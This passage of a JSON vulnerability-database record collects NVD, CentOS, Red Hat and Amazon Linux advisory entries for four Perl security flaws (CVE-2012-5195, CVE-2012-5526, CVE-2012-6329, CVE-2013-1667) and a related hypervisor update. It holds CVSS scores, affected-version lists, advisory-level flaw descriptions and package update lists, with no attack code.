vulnerabilities CVE-2012-5195, CVE-2012-5526, CVE-2012-6329, and CVE-2013-1667", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cve": [{"lastseen": "2020-12-09T19:47:26", "description": "The _compile function in Maketext.pm in the Locale::Maketext implementation in Perl before 5.17.7 does not properly handle backslashes and fully qualified method names during compilation of bracket notation, which allows context-dependent attackers to execute arbitrary commands via crafted input to an application that accepts translation strings from users, as demonstrated by the TWiki application before 5.1.3, and the Foswiki application 1.0.x through 1.0.10 and 1.1.x through 1.1.6.", "edition": 5, "cvss3": {}, "published": "2013-01-04T21:55:00", "title": "CVE-2012-6329", "type": "cve", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-6329"], "modified": "2016-12-08T03:02:00", "cpe": ["cpe:/a:perl:perl:5.13.0", "cpe:/a:perl:perl:5.14.1", "cpe:/a:perl:perl:5.12.0", "cpe:/a:perl:perl:5.11.2", "cpe:/a:perl:perl:5.13.5", "cpe:/a:perl:perl:5.12.3", "cpe:/a:perl:perl:5.13.3", "cpe:/a:perl:perl:5.11.1", "cpe:/a:perl:perl:5.16.1", "cpe:/a:perl:perl:5.13.6", "cpe:/a:perl:perl:5.11.4", "cpe:/a:perl:perl:5.13.9", "cpe:/a:perl:perl:5.14.2", "cpe:/a:perl:perl:5.13.4", "cpe:/a:perl:perl:5.13.7", "cpe:/a:perl:perl:5.10.0", "cpe:/a:perl:perl:5.12.1", "cpe:/a:perl:perl:5.13.11", "cpe:/a:perl:perl:5.11.5", "cpe:/a:perl:perl:5.10", "cpe:/a:perl:perl:5.13.1", "cpe:/a:perl:perl:5.16.0", "cpe:/a:perl:perl:5.16.2", "cpe:/a:perl:perl:5.10.1", "cpe:/a:perl:perl:5.12.2", "cpe:/a:perl:perl:5.14.3", "cpe:/a:perl:perl:5.13.8", "cpe:/a:perl:perl:5.11.3", "cpe:/a:perl:perl:5.13.10", "cpe:/a:perl:perl:5.11.0", "cpe:/a:perl:perl:5.13.2", "cpe:/a:perl:perl:5.14.0"], "id": "CVE-2012-6329", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-6329", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:perl:perl:5.10.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.11.4:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.16.2:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.13.5:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.14.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.13.10:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.0:rc5:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.13.3:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.16.1:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.13.8:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.13.11:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.13.4:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.11.0:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.13.7:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.1:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.14.0:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.13.9:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.0:rc0:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.14.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.10.0:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.14.3:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.10.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.10:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.2:rc1:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.11.1:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.13.0:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.11.2:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.10.1:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.10.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.0:rc4:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.11.3:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.13.1:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.14.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.13.2:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.3:rc3:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.10.1:rc2:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.11.5:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.1:rc2:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.13.6:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.2:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.0:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.16.0:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.14.2:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.3:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.3:rc2:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.3:rc1:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:47:25", "description": "CGI.pm module before 3.63 for Perl does not properly escape newlines in (1) Set-Cookie or (2) P3P headers, which might allow remote attackers to inject arbitrary headers into responses from applications that use CGI.pm.", "edition": 5, "cvss3": {}, "published": "2012-11-21T23:55:00", "title": "CVE-2012-5526", "type": "cve", "cwe": ["CWE-16"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5526"], "modified": "2017-08-29T01:32:00", "cpe": ["cpe:/a:andy_armstrong:cgi.pm:3.62"], "id": "CVE-2012-5526", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-5526", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:andy_armstrong:cgi.pm:3.62:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T12:06:10", "description": "Heap-based buffer overflow in the Perl_repeatcpy function in util.c in Perl 5.12.x before 5.12.5, 5.14.x before 5.14.3, and 5.15.x before 15.15.5 allows context-dependent attackers to cause a denial of service (memory consumption and crash) or possibly execute arbitrary code via the 'x' string repeat operator.", "edition": 3, "cvss3": {}, "published": "2012-12-18T00:55:00", "title": "CVE-2012-5195", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5195"], "modified": "2016-12-08T03:02:00", "cpe": ["cpe:/a:perl:perl:5.14.1", "cpe:/a:perl:perl:5.12.0", "cpe:/a:perl:perl:5.12.3", "cpe:/a:perl:perl:5.14.2", "cpe:/a:perl:perl:5.12.1", "cpe:/a:perl:perl:5.12.4", "cpe:/a:perl:perl:5.12.2", "cpe:/a:perl:perl:5.14.0"], "id": "CVE-2012-5195", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-5195", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:perl:perl:5.14.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.0:rc5:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.1:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.14.0:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.0:rc0:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.14.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.2:rc1:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.0:rc4:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.14.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.3:rc3:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.4:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.1:rc2:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.2:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.0:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.14.2:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.3:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.3:rc2:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.3:rc1:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T12:45:57", "description": "The rehash mechanism in Perl 5.8.2 through 5.16.x allows context-dependent attackers to cause a denial of service (memory consumption and crash) via a crafted hash key.", "edition": 3, "cvss3": {}, "published": "2013-03-14T03:13:00", "title": "CVE-2013-1667", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1667"], "modified": "2017-09-19T01:36:00", "cpe": ["cpe:/a:perl:perl:5.8.10", "cpe:/a:perl:perl:5.13.0", "cpe:/a:perl:perl:5.14.1", "cpe:/a:perl:perl:5.12.0", "cpe:/a:perl:perl:5.8.5", "cpe:/a:perl:perl:5.11.2", "cpe:/a:perl:perl:5.13.5", "cpe:/a:perl:perl:5.12.3", "cpe:/a:perl:perl:5.13.3", "cpe:/a:perl:perl:5.11.1", "cpe:/a:perl:perl:5.8.3", "cpe:/a:perl:perl:5.16.1", "cpe:/a:perl:perl:5.13.6", "cpe:/a:perl:perl:5.11.4", "cpe:/a:perl:perl:5.8.7", "cpe:/a:perl:perl:5.13.9", "cpe:/a:perl:perl:5.14.2", "cpe:/a:perl:perl:5.13.4", "cpe:/a:perl:perl:5.13.7", "cpe:/a:perl:perl:5.10.0", "cpe:/a:perl:perl:5.12.1", "cpe:/a:perl:perl:5.13.11", "cpe:/a:perl:perl:5.11.5", "cpe:/a:perl:perl:5.10", "cpe:/a:perl:perl:5.8.8", "cpe:/a:perl:perl:5.13.1", "cpe:/a:perl:perl:5.8.9", "cpe:/a:perl:perl:5.16.0", "cpe:/a:perl:perl:5.12.4", "cpe:/a:perl:perl:5.8.6", "cpe:/a:perl:perl:5.16.2", "cpe:/a:perl:perl:5.10.1", "cpe:/a:perl:perl:5.12.2", "cpe:/a:perl:perl:5.14.3", "cpe:/a:perl:perl:5.8.2", "cpe:/a:perl:perl:5.8.4", "cpe:/a:perl:perl:5.13.8", "cpe:/a:perl:perl:5.11.3", "cpe:/a:perl:perl:5.13.10", "cpe:/a:perl:perl:5.11.0", "cpe:/a:perl:perl:5.13.2", "cpe:/a:perl:perl:5.14.0"], "id": "CVE-2013-1667", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1667", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:perl:perl:5.10.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.11.4:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.16.2:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.13.5:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.14.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.13.10:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.0:rc5:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.13.3:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.16.1:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.13.8:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.13.11:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.13.4:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.8.8:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.11.0:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.13.7:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.1:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.14.0:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.13.9:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.0:rc0:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.14.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.10.0:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.14.3:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.10.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.10:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.2:rc1:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.11.1:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.13.0:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.8.5:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.11.2:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.8.10:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.10.1:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.10.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.0:rc4:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.11.3:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.13.1:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.14.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.8.9:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.8.6:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.13.2:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.3:rc3:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.10.1:rc2:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.4:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.11.5:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.1:rc2:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.13.6:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.2:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.0:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.8.4:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.8.7:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.16.0:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.14.2:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.3:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.3:rc2:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.3:rc1:*:*:*:*:*:*"]}], "centos": [{"lastseen": "2020-07-17T03:28:50", "bulletinFamily": "unix", "cvelist": ["CVE-2012-5195", "CVE-2013-1667", "CVE-2012-5526", "CVE-2012-6329"], "description": "**CentOS Errata and Security Advisory** CESA-2013:0685\n\n\nPerl is a high-level programming language commonly used for system\nadministration utilities and web programming.\n\nA heap overflow flaw was found in Perl. If a Perl application allowed\nuser input to control the count argument of the string repeat operator, an\nattacker could cause the application to crash or, potentially, execute\narbitrary code with the privileges of the user running the application.\n(CVE-2012-5195)\n\nA denial of service flaw was found in the way Perl's rehashing code\nimplementation, responsible for recalculation of hash keys and\nredistribution of hash content, handled certain input. If an attacker\nsupplied specially-crafted input to be used as hash keys by a Perl\napplication, it could cause excessive memory consumption. (CVE-2013-1667)\n\nIt was found that the Perl CGI module, used to handle Common Gateway\nInterface requests and responses, incorrectly sanitized the values for\nSet-Cookie and P3P headers. If a Perl application using the CGI module\nreused cookies values and accepted untrusted input from web browsers, a\nremote attacker could use this flaw to alter member items of the cookie or\nadd new items. (CVE-2012-5526)\n\nIt was found that the Perl Locale::Maketext module, used to localize Perl\napplications, did not properly handle backslashes or fully-qualified method\nnames. An attacker could possibly use this flaw to execute arbitrary Perl\ncode with the privileges of a Perl application that uses untrusted\nLocale::Maketext templates. (CVE-2012-6329)\n\nRed Hat would like to thank the Perl project for reporting CVE-2012-5195\nand CVE-2013-1667. Upstream acknowledges Tim Brown as the original\nreporter of CVE-2012-5195 and Yves Orton as the original reporter of\nCVE-2013-1667.\n\nAll Perl users should upgrade to these updated packages, which contain\nbackported patches to correct these issues. All running Perl programs\nmust be restarted for this update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2013-March/031706.html\nhttp://lists.centos.org/pipermail/centos-announce/2013-March/031707.html\n\n**Affected packages:**\nperl\nperl-Archive-Extract\nperl-Archive-Tar\nperl-CGI\nperl-CPAN\nperl-CPANPLUS\nperl-Compress-Raw-Bzip2\nperl-Compress-Raw-Zlib\nperl-Compress-Zlib\nperl-Digest-SHA\nperl-ExtUtils-CBuilder\nperl-ExtUtils-Embed\nperl-ExtUtils-MakeMaker\nperl-ExtUtils-ParseXS\nperl-File-Fetch\nperl-IO-Compress-Base\nperl-IO-Compress-Bzip2\nperl-IO-Compress-Zlib\nperl-IO-Zlib\nperl-IPC-Cmd\nperl-Locale-Maketext-Simple\nperl-Log-Message\nperl-Log-Message-Simple\nperl-Module-Build\nperl-Module-CoreList\nperl-Module-Load\nperl-Module-Load-Conditional\nperl-Module-Loaded\nperl-Module-Pluggable\nperl-Object-Accessor\nperl-Package-Constants\nperl-Params-Check\nperl-Parse-CPAN-Meta\nperl-Pod-Escapes\nperl-Pod-Simple\nperl-Term-UI\nperl-Test-Harness\nperl-Test-Simple\nperl-Time-HiRes\nperl-Time-Piece\nperl-core\nperl-devel\nperl-libs\nperl-parent\nperl-suidperl\nperl-version\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2013-0685.html", "edition": 5, "modified": "2013-03-26T22:29:30", "published": "2013-03-26T21:05:02", "href": "http://lists.centos.org/pipermail/centos-announce/2013-March/031706.html", "id": "CESA-2013:0685", "title": "perl security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:44:44", "bulletinFamily": "unix", "cvelist": ["CVE-2012-5195", "CVE-2012-5526", "CVE-2012-6329", "CVE-2013-1667"], "description": "Perl is a high-level programming language commonly used for system\nadministration utilities and web programming.\n\nA heap overflow flaw was found in Perl. If a Perl application allowed\nuser input to control the count argument of the string repeat operator, an\nattacker could cause the application to crash or, potentially, execute\narbitrary code with the privileges of the user running the application.\n(CVE-2012-5195)\n\nA denial of service flaw was found in the way Perl's rehashing code\nimplementation, responsible for recalculation of hash keys and\nredistribution of hash content, handled certain input. If an attacker\nsupplied specially-crafted input to be used as hash keys by a Perl\napplication, it could cause excessive memory consumption. (CVE-2013-1667)\n\nIt was found that the Perl CGI module, used to handle Common Gateway\nInterface requests and responses, incorrectly sanitized the values for\nSet-Cookie and P3P headers. If a Perl application using the CGI module\nreused cookies values and accepted untrusted input from web browsers, a\nremote attacker could use this flaw to alter member items of the cookie or\nadd new items. (CVE-2012-5526)\n\nIt was found that the Perl Locale::Maketext module, used to localize Perl\napplications, did not properly handle backslashes or fully-qualified method\nnames. An attacker could possibly use this flaw to execute arbitrary Perl\ncode with the privileges of a Perl application that uses untrusted\nLocale::Maketext templates. (CVE-2012-6329)\n\nRed Hat would like to thank the Perl project for reporting CVE-2012-5195\nand CVE-2013-1667. Upstream acknowledges Tim Brown as the original\nreporter of CVE-2012-5195 and Yves Orton as the original reporter of\nCVE-2013-1667.\n\nAll Perl users should upgrade to these updated packages, which contain\nbackported patches to correct these issues. All running Perl programs\nmust be restarted for this update to take effect.\n", "modified": "2018-06-06T20:24:15", "published": "2013-03-26T04:00:00", "id": "RHSA-2013:0685", "href": "https://access.redhat.com/errata/RHSA-2013:0685", "type": "redhat", "title": "(RHSA-2013:0685) Moderate: perl security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:46:20", "bulletinFamily": "unix", "cvelist": ["CVE-2012-5195", "CVE-2012-5526", "CVE-2012-6329", "CVE-2013-1591", "CVE-2013-1667", "CVE-2013-1796", "CVE-2013-1797", "CVE-2013-1798", "CVE-2013-2266"], "description": "The rhev-hypervisor6 package provides a Red Hat Enterprise Virtualization\nHypervisor ISO disk image. The Red Hat Enterprise Virtualization Hypervisor\nis a dedicated Kernel-based Virtual Machine (KVM) hypervisor. It includes\neverything necessary to run and manage virtual machines: A subset of the\nRed Hat Enterprise Linux operating environment and the Red Hat Enterprise\nVirtualization Agent.\n\nNote: Red Hat Enterprise Virtualization Hypervisor is only available for\nthe Intel 64 and AMD64 architectures with virtualization extensions.\n\nA flaw was found in the way KVM handled guest time updates when the buffer\nthe guest registered by writing to the MSR_KVM_SYSTEM_TIME machine state\nregister (MSR) crossed a page boundary. A privileged guest user could use\nthis flaw to crash the host or, potentially, escalate their privileges,\nallowing them to execute arbitrary code at the host kernel level.\n(CVE-2013-1796)\n\nA potential use-after-free flaw was found in the way KVM handled guest time\nupdates when the GPA (guest physical address) the guest registered by\nwriting to the MSR_KVM_SYSTEM_TIME machine state register (MSR) fell into a\nmovable or removable memory region of the hosting user-space process (by\ndefault, QEMU-KVM) on the host. If that memory region is deregistered from\nKVM using KVM_SET_USER_MEMORY_REGION and the allocated virtual memory\nreused, a privileged guest user could potentially use this flaw to escalate\ntheir privileges on the host. (CVE-2013-1797)\n\nA flaw was found in the way KVM emulated IOAPIC (I/O Advanced Programmable\nInterrupt Controller). A missing validation check in the\nioapic_read_indirect() function could allow a privileged guest user to\ncrash the host, or read a substantial portion of host kernel memory.\n(CVE-2013-1798)\n\nAn integer overflow flaw was discovered in one of pixman's manipulation\nroutines. If a remote attacker could trick an application using pixman into\nperforming a certain manipulation, it could cause the application to crash\nor, possibly, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2013-1591)\n\nRed Hat would like to thank Andrew Honig of Google for reporting\nCVE-2013-1796, CVE-2013-1797, and CVE-2013-1798.\n\nThis updated package provides updated components that include fixes for\nvarious security issues. These issues have no security impact on Red Hat\nEnterprise Virtualization Hypervisor itself, however. The security fixes\nincluded in this update address the following CVE numbers:\n\nCVE-2013-2266 (a bind issue)\n\nCVE-2012-5195, CVE-2012-5526, CVE-2012-6329, and CVE-2013-1667 (perl\nissues)\n\nThis update contains the fixes from the following errata:\n\novirt-node: RHBA-2013:0745\nlibvirt: RHBA-2013:0725\nvdsm: RHBA-2013:0704\nkernel: RHSA-2013:0744\n\nUsers of the Red Hat Enterprise Virtualization Hypervisor are advised to\nupgrade to this updated package, which corrects these issues.\n", "modified": "2018-06-07T08:59:42", "published": "2013-04-23T04:00:00", "id": "RHSA-2013:0746", "href": "https://access.redhat.com/errata/RHSA-2013:0746", "type": "redhat", "title": "(RHSA-2013:0746) Important: rhev-hypervisor6 security and bug fix update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "amazon": [{"lastseen": "2020-11-10T12:37:24", "bulletinFamily": "unix", "cvelist": ["CVE-2012-5195", "CVE-2013-1667", "CVE-2012-5526", "CVE-2012-6329"], "description": "**Issue Overview:**\n\nA heap overflow flaw was found in Perl. If a Perl application allowed user input to control the count argument of the string repeat operator, an attacker could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application. ([CVE-2012-5195 __](<https://access.redhat.com/security/cve/CVE-2012-5195>))\n\nA denial of service flaw was found in the way Perl's rehashing code implementation, responsible for recalculation of hash keys and redistribution of hash content, handled certain input. If an attacker supplied specially-crafted input to be used as hash keys by a Perl application, it could cause excessive memory consumption. ([CVE-2013-1667 __](<https://access.redhat.com/security/cve/CVE-2013-1667>))\n\nIt was found that the Perl CGI module, used to handle Common Gateway Interface requests and responses, incorrectly sanitized the values for Set-Cookie and P3P headers. If a Perl application using the CGI module reused cookies values and accepted untrusted input from web browsers, a remote attacker could use this flaw to alter member items of the cookie or add new items. ([CVE-2012-5526 __](<https://access.redhat.com/security/cve/CVE-2012-5526>))\n\nIt was found that the Perl Locale::Maketext module, used to localize Perl applications, did not properly handle backslashes or fully-qualified method names. An attacker could possibly use this flaw to execute arbitrary Perl code with the privileges of a Perl application that uses untrusted Locale::Maketext templates. ([CVE-2012-6329 __](<https://access.redhat.com/security/cve/CVE-2012-6329>))\n\n \n**Affected Packages:** \n\n\nperl\n\n \n**Issue Correction:** \nRun _yum update perl_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n perl-suidperl-5.10.1-130.17.amzn1.i686 \n perl-Pod-Escapes-1.04-130.17.amzn1.i686 \n perl-libs-5.10.1-130.17.amzn1.i686 \n perl-version-0.77-130.17.amzn1.i686 \n perl-IO-Compress-Base-2.020-130.17.amzn1.i686 \n perl-Archive-Tar-1.58-130.17.amzn1.i686 \n perl-Test-Harness-3.17-130.17.amzn1.i686 \n perl-Module-Load-0.16-130.17.amzn1.i686 \n perl-Compress-Raw-Bzip2-2.020-130.17.amzn1.i686 \n perl-Archive-Extract-0.38-130.17.amzn1.i686 \n perl-IO-Compress-Bzip2-2.020-130.17.amzn1.i686 \n perl-IPC-Cmd-0.56-130.17.amzn1.i686 \n perl-CGI-3.51-130.17.amzn1.i686 \n perl-Term-UI-0.20-130.17.amzn1.i686 \n perl-5.10.1-130.17.amzn1.i686 \n perl-ExtUtils-CBuilder-0.27-130.17.amzn1.i686 \n perl-Package-Constants-0.02-130.17.amzn1.i686 \n perl-Module-Loaded-0.02-130.17.amzn1.i686 \n perl-core-5.10.1-130.17.amzn1.i686 \n perl-Object-Accessor-0.34-130.17.amzn1.i686 \n perl-Compress-Raw-Zlib-2.023-130.17.amzn1.i686 \n perl-devel-5.10.1-130.17.amzn1.i686 \n 